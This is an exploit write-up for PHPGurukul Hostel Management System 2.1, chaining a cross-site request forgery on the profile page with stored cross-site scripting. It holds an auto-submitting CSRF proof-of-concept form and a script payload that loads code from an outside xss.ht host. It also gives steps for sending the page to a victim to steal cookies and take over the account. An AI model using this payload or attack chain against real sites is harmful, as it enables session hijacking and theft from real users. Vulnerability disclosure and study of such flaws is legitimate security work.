# Exploit Title: PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)# Date: 2021-10-27# Exploit Author: Anubhav Singh# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/hostel-management-system/# Version: V 2.1# Vulnerable endpoint: http://localhost/hostel/hostel/my-profile.php# Tested on Windows 10, XAMPP
Steps to reproduce:1) Navigate to http://localhost/hostel/hostel/my-profile.php
2) Enter xss payload "><script src=https://anubhav1403.xss.ht></script>in name field
3) Click on Update Profile and intercept the request in Burpsuite
4) Generate a CSRF POC of Update Profile
```
<html><body><script>history.pushState('','','/')</script><form action="http://localhost/hostel/hostel/my-profile.php" method="POST"><inputtype="hidden" name="regno" value="123456"/><inputtype="hidden" name="fname" value=""><script src=https://anubhav1403.xss.ht></script>" /><inputtype="hidden" name="mname" value="Hello"/><inputtype="hidden" name="lname" value="Singh"/><inputtype="hidden" name="gender" value="male"/><inputtype="hidden" name="contact" value="12345678995"/><inputtype="hidden" name="email" value="anubhav@gmail.com"/><inputtype="hidden" name="update" value="Update Profile"/><inputtype="submit" value="Submit request"/></form><script>
document.forms[0].submit();</script></body></html>
```
5) Send this POC to victim
6) When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires.7) Now attacker get's the details of victim like ip address, cookies of Victim, etc
8) So attacker is able to steal Victim's cookies successfully!! Account takeover!!!
#POC
